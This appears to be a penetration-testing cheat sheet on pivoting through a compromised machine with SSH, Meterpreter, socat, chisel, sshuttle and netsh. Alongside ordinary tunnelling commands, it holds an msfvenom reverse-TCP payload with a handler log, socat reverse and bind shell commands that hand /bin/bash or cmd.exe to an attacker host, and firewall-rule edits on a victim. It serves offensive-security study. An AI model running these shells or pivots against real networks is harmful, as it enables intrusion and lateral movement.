Skip to content

Proxy & Port forwarding

2 methods :

  • Tunnelling/Proxying: Creating a proxy type connection through a compromised machine in order to route all desired traffic into the targeted network. This could potentially also be tunnelled inside another protocol (e.g. SSH tunnelling), which can be useful for evading a basic Intrusion Detection System (IDS) or firewall.
  • Port Forwarding: Creating a connection between a local port and a single port on a target, via a compromised host.

Port Forwarding tends to be faster and more reliable, but only allows us to access a single port (or a small range) on a target device.

Using SSH

Proxy

Proxy : http://127.0.0.1:8080

ssh -D 8080 user@example.com -fN

Proxy : socks5://127.0.0.1:9050

ssh -g -D 9050 user@example.com -fN

Port forwarding (local)

The example.com machine has a web server running on port 8000 internally (not exposed to the internet). With the following command you can now access the web server from http://localhost:4444.

ssh -L 4444:127.0.0.1:8000 user@example.com -fN
  • -f : Backgrounds ssh.
  • -N : Do not execute a remote command.

Port forwarding (remote)

Goal : localhost:4444 -> host1:4444 -> host2:80

Listen on all interfaces :

# localhost:4444 -> host1:4444 -> host2:80
ssh -R 0.0.0.0:4444:host2:80 user@host1 -fN

Warning

You need also to configure SSH daemon on target host to allow client to specify the bind_address. It is prohibited by default to listen to all interfaces. So, you will always find it listening on loopback even if you specifiy 0.0.0.0 as bind_address.

When you cannot listen on all interfaces :

# localhost:4444 -> host1:4444
ssh -L 4444:127.0.0.1:4444 user@host1 -fN
# host1:4444 -> host2:80
ssh -R 4444:host2:80 user@host1 -fN

Using metasploit (meterpreter)

Port forwarding

  • Generate the exploit with msfvenom.
$ msfvenom -p 'linux/x64/meterpreter_reverse_tcp' LHOST=10.132.0.2 LPORT=9001 -f elf > exploit.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1037272 bytes
Final size of elf file: 1037272 bytes

$ file exploit.bin
exploit.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
  • Setup listener
$ msfconsole
...
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST ens4
LHOST => 10.132.0.2
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.132.0.2:9001
[*] Meterpreter session 1 opened (10.132.0.2:9001 -> 10.154.0.2:45462 ) at 2021-10-19 19:27:31 +0000

meterpreter >
  • Do port forwarding
meterpreter > portfwd add -l 4444 -p 8000 -r 127.0.0.1
[*] Local TCP relay created: :4444 <-> 127.0.0.1:8000
meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local           Remote        Direction
   -----  -----           ------        ---------
   1      127.0.0.1:8000  0.0.0.0:4444  Forward

1 total active port forwards.

meterpreter > portfwd delete -l 4444 -p 8000 -r 127.0.0.1
[*] Successfully stopped TCP relay on 0.0.0.0:4444

-l : Port on your local machine (attacker machine). -p : Port on the remote machine (victim machine). -r : Target host.

Using socat

Port forwarding

./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &

Listent on 33060, then redirect to 172.16.0.10:3306.

  • fork : create new process for every connection.
  • reuseaddr : port stays open after a connection close.

Encrypted shell

Generate certificates :

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
Reverse shell :

# Listener (attacker)
socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0 -

# Connection (victim)
./socat OPENSSL:10.10.10.1:4444,verify=0 EXEC:/bin/bash

Bind shell :

# Listener (victim)
./socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

# Connection (attacker)
socat OPENSSL:10.10.200.1:4444,verify=0 -

Using chisel

Link : chisel.

Port fowarding

Example : localhost:8081 -> victim:8080 (from local)

# Listener (attacker on 10.10.10.1)
./chisel server -p 4444 --reverse

# Connection (victim)
./chisel client 10.10.10.1:4444 R:8081:127.0.0.1:8080

Using sshuttle

Link : sshuttle.

Sshuttle acts as a VPN and allows us to pass our traffic targeting the victim's network through the victim machine. Sshuttle uses the SSH protocol, so communications are encrypted.

# SSH (user / password)
sudo sshuttle -r user@10.100.10.1 -N
# SSH (private key)
sudo sshuttle -r user@10.100.10.1 -N --ssh-cmd 'ssh -i id_rsa'

# Manually set the network range
sudo sshuttle -r user@172.16.0.5 172.16.0.0/24
# or
sudo sshuttle -r user@172.16.0.5 172.16.0.0/24 -x 172.16.0.5

Practical example :

$ sudo sshuttle -r root@10.200.196.200 -N --ssh-cmd 'ssh -i id_rsa -o StrictHostKeychecking=no' &
[1] 6803
c : Connected to server.
# 10.200.196.150, same network as 10.200.196.200
$ curl 10.200.196.150
<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Page not found at /</title>
  <meta name="robots" content="NONE,NOARCHIVE">
  <style type="text/css">
[...]

Using netsh (Windows)

Port fowarding

10.200.81.150:21000 -> 10.200.81.100:80

C:\> netsh advfirewall firewall add rule name="portfwd" dir=in action=allow protocol=tcp localport=21000
Ok.
C:\> netsh interface portproxy add v4tov4 listenport=21000 listenaddress=10.200.81.150 connectport=80 connectaddress=10.200.81.100